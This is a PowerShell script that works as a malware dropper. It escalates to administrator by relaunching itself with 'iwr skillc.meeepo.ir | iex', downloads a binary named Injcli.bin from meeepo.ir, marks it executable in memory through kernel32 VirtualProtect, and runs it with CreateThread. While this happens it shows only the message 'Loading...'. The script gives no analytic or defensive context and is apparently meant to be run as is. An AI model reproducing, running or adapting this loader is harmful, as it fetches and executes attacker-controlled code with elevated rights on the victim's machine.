[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class W32 {
    [DllImport("kernel32.dll")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(
        IntPtr lpThreadAttributes,
        uint dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        out uint lpThreadId);

    [DllImport("kernel32.dll")]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr handle);
}
"@ -Language CSharp



if ([IntPtr]::Size -eq 8) {
    $ps32 = "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

    Start-Process $ps32 -ArgumentList "iwr skillc.meeepo.ir | iex" -Verb RunAs

    exit
}

if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()
    ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {


    Start-Process powershell -ArgumentList "iwr skillc.meeepo.ir | iex" -Verb RunAs

    exit
}

Write-Host "Loading..."

try {
    $sC = (New-Object Net.WebClient).DownloadData("http://meeepo.ir/Injcli.bin")
    $pTR = [Runtime.InteropServices.Marshal]::AllocHGlobal($sC.Length)
    [Runtime.InteropServices.Marshal]::Copy($sC, 0, $pTR, $sC.Length)

    $oP = 0
    [W32]::VirtualProtect($pTR, [UIntPtr]::op_Explicit($sC.Length), 0x40, [ref]$oP)
    $tID = 0
    $hND = [W32]::CreateThread([IntPtr]::Zero, 0, $pTR, [IntPtr]::Zero, 0, [ref]$tID)
    [W32]::WaitForSingleObject($hND, 240000)

}
catch {
    Write-Host "Error: $_" -ForegroundColor Red
}